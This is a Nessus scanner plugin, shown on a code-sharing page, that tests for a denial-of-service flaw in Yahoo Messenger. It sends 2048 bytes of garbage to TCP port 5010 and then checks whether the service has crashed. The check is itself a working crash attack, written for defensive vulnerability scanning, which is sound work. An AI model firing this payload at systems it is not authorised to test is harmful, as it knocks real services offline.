📄 yahoo_dos.nasl
字号:
## This script was written by Noam Rathaus <noamr@securiteam.com>## See the Nessus Scripts License for details##if(description){ script_id(10326); script_version ("$Revision: 1.13 $"); script_cve_id("CAN-2000-0047"); name["english"] = "Yahoo Messenger Denial of Service attack"; script_name(english:name["english"]); desc["english"] = "It is possible to cause Yahoo Messenger to crash by sending a few bytesof garbage into its listening port TCP 5010.Solution: Block those ports from outside communicationRisk factor : Low"; script_description(english:desc["english"]); summary["english"] = "Yahoo Messenger Denial of Service attack"; script_summary(english:summary["english"]); script_category(ACT_DENIAL); script_copyright(english:"This script is Copyright (C) 1999 SecuriTeam"); family["english"] = "Denial of Service"; family["francais"] = "D閚i de service"; script_family(english:family["english"], francais:family["francais"]); script_dependencies("yahoo_msg_running.nasl"); script_require_ports("Services/yahoo_messenger"); exit(0);}## The script code starts here#if (get_port_state(5010)){ sock5010 = open_sock_tcp(5010); if (sock5010) { send(socket:sock5010, data:crap(2048)); close(sock5010); sock5010_sec = open_sock_tcp(5010); if ( !sock5010_sec ) { security_hole(5010); } else close(sock5010_sec); }}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -